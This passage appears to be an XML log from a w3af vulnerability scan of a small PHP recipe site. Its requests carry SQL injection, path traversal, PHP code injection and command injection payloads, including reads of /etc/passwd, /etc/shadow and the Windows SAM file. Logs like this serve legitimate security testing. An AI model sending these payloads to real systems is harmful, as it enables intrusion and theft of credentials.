                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about uszzY has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='uszzY'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="861">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+pg_sleep%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+pg_sleep%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="563">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="53">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="56">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=id&amp;uname%2B-a= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="57">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=.%2F..%2F..%2F..%2Fetc%2Fmotd%00html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="59">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=%3C%3F%2Bpassthru%28%22id%22%29&amp;%3F%3E= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="62">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%2Bc%3A%5C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="64">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=type%2Bc%3A%5Cwinnt%5Crepair%5Csam._ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="65">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=ps%2B-aux HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="68">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=..%2F..%2F..%2F..%2Fbin%2Fchgrp%2Bnobody%2B%2Fetc%2Fshadow%7C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="70">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=SELECT%2BTOP%2B1%2Bname%2BFROM%2Bsysusers HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="71">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=exec%2Bmaster..xp_cmdshell%2Bdir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="75">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?375zJLX=exec%2Bxp_cmdshell%2Bdir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="782">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="598">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/42+AND+42%3D43+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 42+AND+42%3D43+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='42+AND+42%3D43+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="91">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="731">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24%27+AND+%2724%27%3D%2725 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24%27+AND+%2724%27%3D%2725 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24%27+AND+%2724%27%3D%2725'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="97">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="98">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="101">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="105">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="583">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/42+OR+42%3D42+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 42+OR+42%3D42+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='42+OR+42%3D42+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="108">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/qArmO.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/qArmO.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="110">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="787">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
